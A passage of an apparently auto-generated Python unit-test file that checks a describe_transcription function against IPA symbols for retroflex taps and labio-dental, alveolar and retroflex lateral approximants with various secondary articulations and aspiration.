# voiced aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰˤ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless labio-dental approximant pulmonic egressive consonant
def test_ʋ̊_is_the_representation_of_the_voiceless_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊")
self.assertEqual(actual, expected)
def test_ʋ̥_is_the_representation_of_the_voiceless_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥")
self.assertEqual(actual, expected)
# voiceless labialized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʷ")
self.assertEqual(actual, expected)
def test_ʋ̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʲ")
self.assertEqual(actual, expected)
def test_ʋ̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ˠ")
self.assertEqual(actual, expected)
def test_ʋ̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ˤ")
self.assertEqual(actual, expected)
def test_ʋ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʋ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced labio-dental approximant pulmonic egressive consonant
def test_ʋ_is_the_representation_of_the_voiced_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ")
self.assertEqual(actual, expected)
# voiced labialized labio-dental approximant pulmonic egressive consonant
def test_ʋʷ_is_the_representation_of_the_voiced_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʷ")
self.assertEqual(actual, expected)
# voiced palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʲ")
self.assertEqual(actual, expected)
# voiced velarized labio-dental approximant pulmonic egressive consonant
def test_ʋˠ_is_the_representation_of_the_voiced_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋˤ")
self.assertEqual(actual, expected)
# voiced aspirated labio-dental approximant pulmonic egressive consonant
def test_ʋʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labio-dental approximant pulmonic egressive consonant
def test_ʋʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰʷ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰʲ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labio-dental approximant pulmonic egressive consonant
def test_ʋʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰˠ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labio-dental approximant pulmonic egressive consonant
def test_ʋʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋʰˤ")
self.assertEqual(actual, expected)
def test_ʋ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar approximant pulmonic egressive consonant
def test_ɹ̊_is_the_representation_of_the_voiceless_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊")
self.assertEqual(actual, expected)
def test_ɹ̥_is_the_representation_of_the_voiceless_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʷ")
self.assertEqual(actual, expected)
def test_ɹ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʲ")
self.assertEqual(actual, expected)
def test_ɹ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ˠ")
self.assertEqual(actual, expected)
def test_ɹ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ˤ")
self.assertEqual(actual, expected)
def test_ɹ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɹ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar approximant pulmonic egressive consonant
def test_ɹ_is_the_representation_of_the_voiced_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ")
self.assertEqual(actual, expected)
# voiced labialized alveolar approximant pulmonic egressive consonant
def test_ɹʷ_is_the_representation_of_the_voiced_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar approximant pulmonic egressive consonant
def test_ɹʲ_is_the_representation_of_the_voiced_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar approximant pulmonic egressive consonant
def test_ɹˠ_is_the_representation_of_the_voiced_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar approximant pulmonic egressive consonant
def test_ɹʰ_is_the_representation_of_the_voiced_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar approximant pulmonic egressive consonant
def test_ɹʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰʷ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar approximant pulmonic egressive consonant
def test_ɹʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰʲ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar approximant pulmonic egressive consonant
def test_ɹʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰˠ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar approximant pulmonic egressive consonant
def test_ɹʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹʰˤ")
self.assertEqual(actual, expected)
def test_ɹ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar approximant pulmonic egressive consonant"
actual = describe_transcription("ɹ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊_is_the_representation_of_the_voiceless_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊")
self.assertEqual(actual, expected)
def test_ɭ̥_is_the_representation_of_the_voiceless_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʷ")
self.assertEqual(actual, expected)
def test_ɭ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʲ")
self.assertEqual(actual, expected)
def test_ɭ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ˠ")
self.assertEqual(actual, expected)
def test_ɭ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ˤ")
self.assertEqual(actual, expected)
def test_ɭ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɭ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex lateral approximant pulmonic egressive consonant
def test_ɭ_is_the_representation_of_the_voiced_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ")
self.assertEqual(actual, expected)
# voiced labialized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʷ_is_the_representation_of_the_voiced_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʲ_is_the_representation_of_the_voiced_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭˠ_is_the_representation_of_the_voiced_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰ_is_the_representation_of_the_voiced_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex lateral approximant pulmonic egressive consonant
